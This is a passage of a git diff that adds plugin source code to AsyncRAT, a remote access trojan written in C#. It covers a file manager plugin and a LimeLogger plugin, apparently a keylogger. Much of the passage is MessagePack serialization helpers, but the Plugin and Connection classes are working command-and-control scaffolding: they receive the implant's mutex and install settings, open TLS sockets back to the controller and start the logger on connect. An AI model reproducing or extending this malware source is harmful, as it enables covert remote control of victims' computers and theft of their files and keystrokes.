+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Packet.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Packet.cs
new file mode 100644
index 0000000..482f539
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Packet.cs
@@ -0,0 +1,49 @@
+using Plugin.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static string FileCopy = null;
+
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "fileManager":
+ {
+ new FileManager(unpack_msgpack);
+ }
+ break;
+ }
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ }
+
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
new file mode 100644
index 0000000..5bc9da7
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
@@ -0,0 +1,45 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public static Mutex AppMutex;
+ public static string Mutex;
+ public static string BDOS;
+ public static string Install;
+ public static string InstallFile;
+
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ AppMutex = mutex;
+ Mutex = mtx;
+ BDOS = bdos;
+ Install = install;
+ InstallFile = installFile;
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..891c31b
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+//[assembly: AssemblyTitle("FileManager")]
+//[assembly: AssemblyDescription("")]
+//[assembly: AssemblyConfiguration("")]
+//[assembly: AssemblyCompany("")]
+//[assembly: AssemblyProduct("FileManager")]
+//[assembly: AssemblyCopyright("Copyright © 2019")]
+//[assembly: AssemblyTrademark("")]
+//[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("bee88186-769a-452c-9dd9-d0e0815d92bf")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Client/Connection/TempSocket.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs
similarity index 92%
rename from AsyncRAT-C#/Client/Connection/TempSocket.cs
rename to AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs
index a3fefec..23ec801 100644
--- a/AsyncRAT-C#/Client/Connection/TempSocket.cs
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs
@@ -1,8 +1,4 @@
-using Client.Handle_Packet;
-using Client.Helper;
-using Client.MessagePack;
-using Microsoft.VisualBasic.Devices;
-using System;
+using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
@@ -13,7 +9,7 @@ using System.Net.Security;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Net;
-using Client.Algorithm;
+using Plugin.MessagePack;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@@ -21,7 +17,7 @@ using Client.Algorithm;
// This program is distributed for educational purposes only.
-namespace Client.Connection
+namespace Plugin
{
public class TempSocket
{
@@ -37,7 +33,7 @@ namespace Client.Connection
public TempSocket()
{
- if (!ClientSocket.IsConnected) return;
+ if (!Connection.IsConnected) return;
try
{
@@ -47,7 +43,7 @@ namespace Client.Connection
SendBufferSize = 50 * 1024,
};
- TcpClient.Connect(ClientSocket.TcpClient.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.TcpClient.RemoteEndPoint.ToString().Split(':')[1]));
+ TcpClient.Connect(Connection.TcpClient.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Connection.TcpClient.RemoteEndPoint.ToString().Split(':')[1]));
Debug.WriteLine("Temp Connected!");
IsConnected = true;
@@ -71,7 +67,7 @@ namespace Client.Connection
#if DEBUG
return true;
#endif
- return Settings.ServerCertificate.Equals(certificate);
+ return Connection.ServerCertificate.Equals(certificate);
}
public void Dispose()
@@ -98,7 +94,7 @@ namespace Client.Connection
{
try
{
- if (!ClientSocket.IsConnected || !IsConnected)
+ if (!Connection.IsConnected || !IsConnected)
{
IsConnected = false;
Dispose();
@@ -162,7 +158,7 @@ namespace Client.Connection
{
try
{
- if (!IsConnected || !ClientSocket.IsConnected)
+ if (!IsConnected || !Connection.IsConnected)
{
Dispose();
return;
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger.sln b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger.sln
new file mode 100644
index 0000000..bad8c47
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LimeLogger", "LimeLogger\LimeLogger.csproj", "{DAFE686A-461B-402B-BBD7-2A2F4C87C773}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {2E2428AA-B37D-4539-89E0-B88E9A8AE931}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs
new file mode 100644
index 0000000..d80ed26
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient()
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ HandleLimeLogger.isON = true;
+ HandleLimeLogger.Run();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj
new file mode 100644
index 0000000..5074274
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj
@@ -0,0 +1,55 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {DAFE686A-461B-402B-BBD7-2A2F4C87C773}
+ Library
+ Properties
+ Plugin
+ LimeLogger
+ v4.0
+ 512
+ true
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
